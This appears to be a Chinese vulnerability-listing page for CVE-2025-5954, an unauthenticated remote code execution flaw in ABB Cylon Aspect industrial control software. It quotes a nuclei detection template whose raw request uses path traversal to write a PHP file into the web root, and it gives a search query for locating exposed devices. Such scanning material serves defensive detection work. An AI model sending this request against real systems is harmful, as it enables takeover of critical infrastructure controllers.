ABB Cylon Aspect Remote Code Execution Vulnerability

漏洞信息

漏洞名称: ABB Cylon Aspect Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-5954

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: ABB Cylon Aspect是一款广泛应用于工业控制系统(ICS)和监控与数据采集(SCADA)系统的软件,用于实现设备的监控和管理。该软件在工业自动化领域有着广泛的应用,特别是在关键基础设施中。此次发现的漏洞存在于ABB Cylon Aspect 3.08.04版本中,具体为DeploySource servlet存在未授权的远程代码执行漏洞。攻击者可以通过构造特殊的HTTP请求,利用filename参数中的目录遍历漏洞,结合特定的Host头,向服务器写入任意的PHP文件,从而实现远程代码执行。这一漏洞的技术根源在于服务器对用户输入的处理不当,未能正确验证和限制用户提供的文件名参数,导致攻击者可以利用目录遍历技术写入恶意文件。由于该漏洞允许未授权的攻击者远程执行任意代码,其潜在的安全风险极高,可能导致攻击者完全控制受影响的系统,执行任意命令,窃取敏感数据,甚至破坏工业控制系统的正常运行。由于该漏洞不需要任何形式的认证即可被利用,且攻击过程可以自动化,因此对使用该软件的企业和组织构成了严重威胁。

产品厂商: ABB

产品名称: Cylon Aspect

影响版本: 3.08.04

搜索语法: http.html:”AspectFT”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/40d07566f164d7f5934e82170230a3692170aac7/http%2Fcves%2F2025%2FCVE-2025-5954.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: CVE-2025-5954

info:
  name: ABB Cylon Aspect 3.08.04 - Remote Code Execution
  author: vijay-sutar
  severity: critical
  description: |
    ABB Cylon Aspect version 3.08.04 is vulnerable to an unauthenticated remote code execution via the DeploySource servlet. It allows an attacker to write arbitrary PHP files using directory traversal in the filename parameter with a special Host header.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5954
  tags: cve,abb,rce,file-upload,traversal,iot,scada
  metadata:
    max-request: 1
    shodan-query: http.html:"AspectFT"
    verified: true

http:
  - raw:
      - |
        POST /Aspect/DataServlets/DeploySource?filename=../../../webapps/ROOT/shell.php HTTP/1.1
        Host: 127.0.0.1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 36

        <?php echo md5('cylon_rce'); ?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Success")'

  - method: GET
    path:
      - "{{BaseURL}}/shell.php"

    matchers:
      - type: word
        words:
          - "5e577aa52bc15d1b44699a7e89d5d4e0"
        part: body


Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
ABB Cylon Aspect Remote Code Execution Vulnerability
http://example.com/2025/07/17/github_567841106/
作者
lianccc
发布于
2025年7月17日
许可协议